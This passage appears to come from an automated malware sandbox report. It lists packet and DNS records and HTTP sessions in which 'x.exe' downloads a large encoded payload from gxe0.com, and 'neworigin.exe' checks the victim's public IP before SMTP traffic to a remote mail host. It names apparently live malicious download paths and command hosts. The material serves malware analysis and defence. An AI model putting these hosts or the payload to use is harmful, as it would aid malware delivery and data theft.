                                                                                                                              Nov 11, 2024 18:03:02.800054073 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:02.805408955 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:02.968486071 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.005634069 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.011857033 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.179666996 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.193314075 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.198246002 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.360687017 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.361949921 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.366877079 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.533675909 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.536575079 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.541738987 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.704122066 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.704804897 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.704874039 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.704907894 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.704943895 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.704988956 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.705038071 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.705073118 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.705106020 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.705219984 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.705280066 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:03:03.709988117 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.709997892 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.710006952 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.710016012 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.710109949 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.710119963 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.881195068 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:03:03.921683073 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.795043945 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.797338963 CET49717587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.800038099 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.802331924 CET5874971751.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.963781118 CET5874972051.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.964139938 CET49720587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.964431047 CET49724587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.964792967 CET5874971751.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.965071917 CET49717587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.965234041 CET49725587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.969388962 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.969461918 CET49724587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:35.971065044 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:35.971124887 CET49725587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.553313017 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.553467035 CET49724587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.555336952 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.555495977 CET49725587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.558360100 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.560452938 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.720927000 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.721096039 CET49724587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.723057985 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.723264933 CET49725587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.726027012 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.728120089 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.888806105 CET5874972451.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.891134024 CET5874972551.195.88.199192.168.2.8
                                                                                                                              Nov 11, 2024 18:04:36.937164068 CET49725587192.168.2.851.195.88.199
                                                                                                                              Nov 11, 2024 18:04:36.937257051 CET49724587192.168.2.851.195.88.199
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 11, 2024 18:02:27.066129923 CET5268453192.168.2.81.1.1.1
                                                                                                                              Nov 11, 2024 18:02:27.092536926 CET53526841.1.1.1192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:38.673705101 CET5709553192.168.2.81.1.1.1
                                                                                                                              Nov 11, 2024 18:02:38.680418015 CET53570951.1.1.1192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:40.167383909 CET4935053192.168.2.81.1.1.1
                                                                                                                              Nov 11, 2024 18:02:40.176980019 CET53493501.1.1.1192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:46.848764896 CET5047953192.168.2.81.1.1.1
                                                                                                                              Nov 11, 2024 18:02:46.856796980 CET53504791.1.1.1192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:55.250685930 CET5369653192.168.2.81.1.1.1
                                                                                                                              Nov 11, 2024 18:02:55.258260012 CET53536961.1.1.1192.168.2.8
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 11, 2024 18:02:27.066129923 CET192.168.2.81.1.1.10xa013Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:38.673705101 CET192.168.2.81.1.1.10x70abStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:40.167383909 CET192.168.2.81.1.1.10x9614Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:46.848764896 CET192.168.2.81.1.1.10x3a95Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:55.250685930 CET192.168.2.81.1.1.10x96afStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 11, 2024 18:02:27.092536926 CET1.1.1.1192.168.2.80xa013No error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:38.680418015 CET1.1.1.1192.168.2.80x70abNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:38.680418015 CET1.1.1.1192.168.2.80x70abNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:38.680418015 CET1.1.1.1192.168.2.80x70abNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:40.176980019 CET1.1.1.1192.168.2.80x9614No error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:46.856796980 CET1.1.1.1192.168.2.80x3a95No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                              Nov 11, 2024 18:02:55.258260012 CET1.1.1.1192.168.2.80x96afNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                              • gxe0.com
                                                                                                                              • api.ipify.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.849706198.252.105.914434424C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-11 17:02:28 UTC161OUTGET /yak/233_Wisrysxlfss HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                              Host: gxe0.com
                                                                                                                              2024-11-11 17:02:28 UTC365INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              last-modified: Mon, 28 Oct 2024 23:14:08 GMT
                                                                                                                              accept-ranges: bytes
                                                                                                                              content-length: 2562520
                                                                                                                              date: Mon, 11 Nov 2024 17:02:28 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2024-11-11 17:02:28 UTC1003INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                                              Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                                              2024-11-11 17:02:28 UTC14994INData Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71
                                                                                                                              Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70
                                                                                                                              Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31
                                                                                                                              Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35
                                                                                                                              Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30
                                                                                                                              Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a
                                                                                                                              Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79
                                                                                                                              Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
                                                                                                                              2024-11-11 17:02:28 UTC16384INData Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65
                                                                                                                              Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
                                                                                                                              2024-11-11 17:02:28 UTC387INData Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70
                                                                                                                              Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.849707104.26.12.2054434352C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-11 17:02:39 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-11 17:02:39 UTC399INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 11 Nov 2024 17:02:39 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 13
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e0fd9e81c677290-EWR
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1803237&cwnd=237&unsent_bytes=0&cid=9079a08c4e887110&ts=185&x=0"
                                                                                                                              2024-11-11 17:02:39 UTC13INData Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39
                                                                                                                              Data Ascii: 66.23.206.109


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.849715104.26.12.2054437572C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-11 17:02:48 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-11 17:02:49 UTC398INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 11 Nov 2024 17:02:48 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 13
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e0fda23faca6fcb-IAD
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6825&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=421788&cwnd=223&unsent_bytes=0&cid=718f6f28a0d629f6&ts=182&x=0"
                                                                                                                              2024-11-11 17:02:49 UTC13INData Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39
                                                                                                                              Data Ascii: 66.23.206.109


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
